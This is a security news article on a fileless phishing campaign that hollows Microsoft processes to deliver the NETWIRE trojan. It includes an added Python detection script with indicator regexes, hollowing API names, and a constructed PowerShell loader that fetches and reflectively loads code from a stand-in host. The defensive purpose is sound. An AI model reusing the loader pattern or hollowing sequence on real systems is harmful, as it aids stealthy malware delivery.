Researchers have come across a new phishing campaign in which attackers targeted multiple customers using a fileless code injection attack. The injection technique, known as process hollowing, was combined here with VBScript, PowerShell, and the .NET framework. The phishing campaign was discovered in February 2019.
How does it work - According to the researchers from FireEye, the attackers abused the ability to load a .NET assembly from memory in order to execute malware directly within the PowerShell process. This helped the criminals evade detection, because no PE file ever needed to be written to disk.
The campaign relies heavily on cloud-based storage services to host its payloads, which helps it get past download restrictions. Here, users are prompted to open a document stored on Google Drive. One such file was used to target members of the airline industry that operate a particular aircraft model.
If the user opens the document, a PowerShell script is executed after multiple levels of obfuscation. This script loads a .NET assembly from a remote URL, which acts as a downloader for the final payload, the NETWIRE trojan.
“Upon execution, after multiple levels of obfuscation, a PowerShell script is executed that loads a .NET assembly from a remote URL, functions of which are then used to inject the final payload (NETWIRE Trojan) into a benign Microsoft executable using process hollowing. This can potentially bypass application whitelisting since all processes spawned during the attack are legitimate Microsoft executables,” said FireEye in its report.
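The chain described above leaves little on disk, so the practical detection surface is the PowerShell script block itself (Windows PowerShell script block logging, Event ID 4104, records blocks after PowerShell has decoded them) and the bytes of the assembly that gets loaded. The following detection sketch is an added example, not code from FireEye's report or from the campaign: it scores a script block for the remote-fetch, in-memory assembly-load and reflective-invoke stages, and separately checks whether the loaded assembly's P/Invoke entry points spell out the process-hollowing API sequence (suspended CreateProcess, NtUnmapViewOfSection, VirtualAllocEx, WriteProcessMemory, SetThreadContext, ResumeThread). All sample script text and assembly bytes are constructed for illustration; the URLs and type names in them are hypothetical.

```python
"""Score a PowerShell script block plus the assembly it loads for the
remote .NET assembly load + process hollowing pattern (added example)."""
import re
from typing import Dict, List

# Stage indicators: case-insensitive regexes over deobfuscated script text.
SCRIPT_STAGES: Dict[str, List[str]] = {
    # stage 1: payload bytes pulled from a remote URL
    "remote_fetch": [
        r"New-Object\s+(System\.)?Net\.WebClient",
        r"\.Download(Data|String)\s*\(",
        r"Invoke-WebRequest|\biwr\b",
        r"https?://",
    ],
    # stage 2: a .NET assembly loaded into the PowerShell process from memory
    "assembly_load": [
        r"\[(System\.)?Reflection\.Assembly\]::Load\s*\(",
        r"\[(System\.)?AppDomain\]::CurrentDomain\.Load\s*\(",
    ],
    # stage 3: a type the script never defined is located and invoked
    "reflective_invoke": [
        r"\.GetType\(\s*['\"][^'\"]+['\"]\s*\)",
        r"\.GetMethod\(\s*['\"][^'\"]+['\"]\s*\)",
        r"\.Invoke\s*\(",
    ],
}

# Native API names that implement process hollowing. A .NET assembly stores
# its DllImport entry points as plain strings in the metadata #Strings heap,
# so they are visible in the downloaded bytes or in a memory dump.
HOLLOWING_APIS = [
    b"CreateProcess", b"NtUnmapViewOfSection", b"VirtualAllocEx",
    b"WriteProcessMemory", b"SetThreadContext", b"ResumeThread",
]


def script_stages_hit(block: str) -> List[str]:
    """Return the stage names whose indicators appear in the script block."""
    return [
        stage for stage, patterns in SCRIPT_STAGES.items()
        if any(re.search(p, block, re.IGNORECASE) for p in patterns)
    ]


def assembly_hollowing_apis(blob: bytes) -> List[str]:
    """Return the hollowing-related API names present as strings in the blob."""
    return [api.decode() for api in HOLLOWING_APIS if api in blob]


def verdict(block: str, blob: bytes) -> str:
    """Combine both signals into a single label."""
    stages = set(script_stages_hit(block))
    apis = assembly_hollowing_apis(blob)
    # Remote bytes loaded as an assembly that imports most of the hollowing
    # primitives: ResumeThread or CreateProcess alone would be benign.
    if {"remote_fetch", "assembly_load"} <= stages and len(apis) >= 4:
        return "process-hollowing-loader"
    if {"remote_fetch", "assembly_load"} <= stages:
        return "suspicious-remote-assembly-load"
    return "benign"


# Constructed script block resembling the described loader (hypothetical URLs
# and type names, not the real sample).
SUSPICIOUS_BLOCK = r"""
$wc = New-Object Net.WebClient
$bytes = $wc.DownloadData('http://cloud-storage.example/drive/asm.bin')
$asm = [Reflection.Assembly]::Load($bytes)
$asm.GetType('Loader.Stage').GetMethod('Run').Invoke($null, @('http://cloud-storage.example/drive/final.bin'))
"""

# Constructed benign admin script that also brings in a .NET assembly.
BENIGN_BLOCK = r"""
Add-Type -AssemblyName System.Windows.Forms
[System.Windows.Forms.MessageBox]::Show('Patching complete')
"""

# Constructed stand-ins for assembly metadata ("BSJB" is the CLI metadata
# signature; DllImport names are NUL-terminated UTF-8 strings).
HOLLOWING_ASSEMBLY = (
    b"BSJB\x00\x00\x00\x00kernel32.dll\x00CreateProcessA\x00"
    b"ntdll.dll\x00NtUnmapViewOfSection\x00VirtualAllocEx\x00"
    b"WriteProcessMemory\x00GetThreadContext\x00SetThreadContext\x00ResumeThread\x00"
)
CLEAN_ASSEMBLY = b"BSJB\x00\x00\x00\x00System.Windows.Forms\x00MessageBox\x00Show\x00"

if __name__ == "__main__":
    print(verdict(SUSPICIOUS_BLOCK, HOLLOWING_ASSEMBLY))  # process-hollowing-loader
    print(verdict(SUSPICIOUS_BLOCK, CLEAN_ASSEMBLY))      # suspicious-remote-assembly-load
    print(verdict(BENIGN_BLOCK, CLEAN_ASSEMBLY))          # benign
```

Two caveats for anyone turning this into a real rule. The script-block signal only exists if script block logging is enabled on the endpoint, and the assembly signal assumes the loader resolves its native imports through ordinary DllImport declarations; a loader that resolves them dynamically or obfuscates the names will only trip the weaker "suspicious-remote-assembly-load" path, which is still worth alerting on because legitimate administration rarely loads assemblies straight from a download.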
What are NETWIRE's capabilities - Once installed, the NETWIRE backdoor connects to the attackers' C2 server to receive further commands and to send back the collected user data.
NETWIRE's capabilities include keylogging, a reverse shell, and password theft. The backdoor uses a custom encryption algorithm to encrypt the stolen data before writing it to a file created in the ./LOGS directory. It can also capture session login details and system details, take screenshots, monitor CPU usage, and create a fake HTTP proxy.
“The malware also contains a custom obfuscation algorithm to hide registry keys, APIs, DLL names, and other strings from static analysis,” FireEye added.
The bottom line - FireEye expects malware authors to keep using different fileless process execution techniques to evade detection and advance their attacks. Such methods are effective because they exploit, in FireEye's words, “the lack of visibility into .NET process execution combined with the flexibility of PowerShell.”